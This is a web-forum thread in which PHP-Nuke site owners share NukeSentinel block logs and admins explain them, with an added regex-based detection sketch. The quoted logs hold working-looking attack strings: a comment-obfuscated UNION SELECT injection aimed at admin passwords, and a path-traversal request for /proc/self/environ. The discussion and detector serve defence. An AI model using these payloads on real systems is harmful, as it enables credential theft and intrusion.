Doulos Life Cycles Becoming CPU Cycles

Joined: Jun 06, 2005 Posts: 545
|
Posted:
Fri Jan 19, 2007 11:49 pm |
|
Twice today I got this in my email (second time had different IP address):
| Quote: | Date & Time: 2007-01-19 18:26:32 CST GMT -0600
Blocked IP: 64.251.10.133
User ID: Anonymous (1)
Reason: Abuse-CLike
User Agent: libwww-perl/5.803
Query String: clanfga.com/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Get String: clanfga.com/modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
Post String: clanfga.com/modules.php
Forwarded For: none
Client IP: none
Remote Address: 64.251.10.133
Remote Port: 34935
Request Method: GET
|
Is this something I need to worry about? Never had anyone blocked for Abuse-CLike before. |
|
|
|
 |
Guardian2003 Site Admin

Joined: Aug 28, 2003 Posts: 6373 Location: Vsetin, Czech Republic
|
Posted:
Sat Jan 20, 2007 1:15 am |
|
The block occurred because someone used a union attack in an attempt to retrieve the admin's user/password. Sentinel will protect you from these types of attack. |
|
|
|
 |
evaders99 Former Moderator in Good Standing

Joined: Apr 30, 2004 Posts: 3221
|
Posted:
Sun Jan 21, 2007 12:51 am |
|
Yep, this is a known (old) vulnerability. Don't worry about it; if you are up-to-date with patches and Sentinel, you are fine. |
|
|
|
 |
warren-the-ape Worker


Joined: Nov 19, 2007 Posts: 196 Location: Netherlands
|
Posted:
Sat Jan 12, 2008 2:40 pm |
|
Got this one today as well. Our 1st Clike attack.
This dude (IP:83.20.148.210, email; ) even registered on our website/forum..
| Code: | User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15
Query String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors
Get String: website.com/modules.php?name=Search
&type=comments
&query=not123exists
&instory=/* */UNION/* */SELECT/* */0,0,pwd,0,aid/* */FROM/* */nuke_authors
Post String: website.com/modules.php |
But are these attacks already blocked by a patched php-nuke version?
'Cause when installing NS I remembered seeing some 'Union' code in some of the nuke files. |
|
|
|
 |
evaders99 Former Moderator in Good Standing

Joined: Apr 30, 2004 Posts: 3221
|
Posted:
Sat Jan 12, 2008 11:18 pm |
|
Oh yeah, this is an old one. It is patched already. |
|
|
|
 |
grmm New Member


Joined: Nov 15, 2008 Posts: 16 Location: Idaho, USA
|
Posted:
Thu Jun 03, 2010 7:02 am |
|
Is this normal...
These seem to come in clusters of 4 or 5, always happen in the middle of the night, are occurring more and more frequently, and each IP is listed twice when I check my emails every morning.
Last night I had five, and the email notices look like this:
Blocked abuse for 94.198.96*
Blocked abuse for 94.198.96*
Blocked abuse for 209.188.90.*
Blocked abuse for 209.188.90.*
Blocked abuse for 174.123.39.*
Blocked abuse for 174.123.39.*
Blocked abuse for 67.18.167.*
Blocked abuse for 67.18.167.*
Blocked abuse for 74.200.76.*
Blocked abuse for 74.200.76.*
I did a search on the IPs in NukeSentinel and they are in fact all blocked now.
Thanks |
|
|
|
 |
Guardian2003 Site Admin

Joined: Aug 28, 2003 Posts: 6373 Location: Vsetin, Czech Republic
|
Posted:
Thu Jun 03, 2010 12:31 pm |
|
Yes, it's perfectly normal. |
|
|
|
 |
snype Regular


Joined: Aug 12, 2008 Posts: 58
|
Posted:
Thu Jun 03, 2010 12:54 pm |
|
5, that's not bad. Wait till you are getting 100s a week. I opened my emails yesterday, first time for a week, and received over 500 of these. In the end my email program had to close the connection to the host and I had to mass delete them, then sync my emails again. |
|
|
|
 |
grmm New Member


Joined: Nov 15, 2008 Posts: 16 Location: Idaho, USA
|
Posted:
Thu Jun 03, 2010 1:57 pm |
|
Thanks Guardian, thanks Snype.
"100s a week", I kinda freaked out when they first started showing up, I feel better now. lol |
|
|
|
 |
unicornio Involved


Joined: Aug 13, 2009 Posts: 432
|
Posted:
Wed Jun 09, 2010 1:12 am |
|
I am getting this
| Code: | Script Name: /modules.php
Query String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0 |
| Code: | Script Name: /modules.php
Query String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ
Get String: name=Video_Stream&d=4/*?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ\0 |
It looks like they are using the same code attack for any module. |
|
|
|
 |
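A sketch of the kind of request check that yields blocks like the ones quoted in this thread, as an added example: it is not NukeSentinel's code and not part of any post. The function names, rule labels and regexes are assumptions; the first two samples are adapted from the logs above, the third is constructed.

```python
import re
from urllib.parse import unquote_plus

# Samples: the first two are adapted from the logs quoted in this thread
# (host removed); the third is a constructed benign search.
SAMPLE_UNION = ("name=Search&type=comments&query=not123exists&instory="
                "/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors")
SAMPLE_LFI = ("name=GCalendar&file=viewday&y=2010&m=2&d=25/*?option=com_gcalendar"
              "&controller=" + "../" * 15 + "proc/self/environ\\0")
SAMPLE_BENIGN = "name=Search&type=stories&query=credit+union"

# /**/ and /* */ stand in for spaces so that a naive "UNION SELECT" match misses.
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
ADMIN_TABLE = re.compile(r"\bnuke_authors\b", re.I)
TRAVERSAL = re.compile(r"(?:\.\.[/\\]){2,}")

def decode(query: str) -> str:
    """URL-decode twice so that double-encoded input is seen in clear."""
    return unquote_plus(unquote_plus(query))

def normalize_sql(decoded: str) -> str:
    """Replace inline SQL comments with a space and collapse whitespace."""
    return re.sub(r"\s+", " ", SQL_COMMENT.sub(" ", decoded))

def classify(query: str) -> list:
    """Return the rule labels (hypothetical names) that a query string trips."""
    decoded = decode(query)
    sql_view = normalize_sql(decoded)
    reasons = []
    if UNION_SELECT.search(sql_view):
        reasons.append("union-select")
    if ADMIN_TABLE.search(sql_view):
        reasons.append("admin-table")
    # Traversal checks use the decoded text before comment stripping.
    if TRAVERSAL.search(decoded):
        reasons.append("path-traversal")
    if "/proc/self/environ" in decoded:
        reasons.append("proc-environ")
    if "\x00" in decoded or decoded.endswith("\\0"):
        reasons.append("null-byte")
    return reasons

if __name__ == "__main__":
    for sample in (SAMPLE_UNION, SAMPLE_LFI, SAMPLE_BENIGN):
        print(classify(sample) or "clean", "<-", sample[:60])
```

A pattern check like this is a tripwire in front of the application; as the replies above say, the Search flaw itself is closed by the current patches.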
spasticdonkey RavenNuke(tm) Development Team

Joined: Dec 02, 2006 Posts: 1364 Location: Texas, USA
|
Posted:
Wed Jun 09, 2010 6:29 am |
|
Yes, that's some boneheads trying to attack the wrong gCalendar.
|
|
|
|
 |
montego Site Admin

Joined: Aug 29, 2004 Posts: 9133 Location: Arizona
|
Posted:
Sat Jun 12, 2010 7:14 am |
|
School's out for many and so the Script Kiddies are back at it in force. |
|
|
|
 |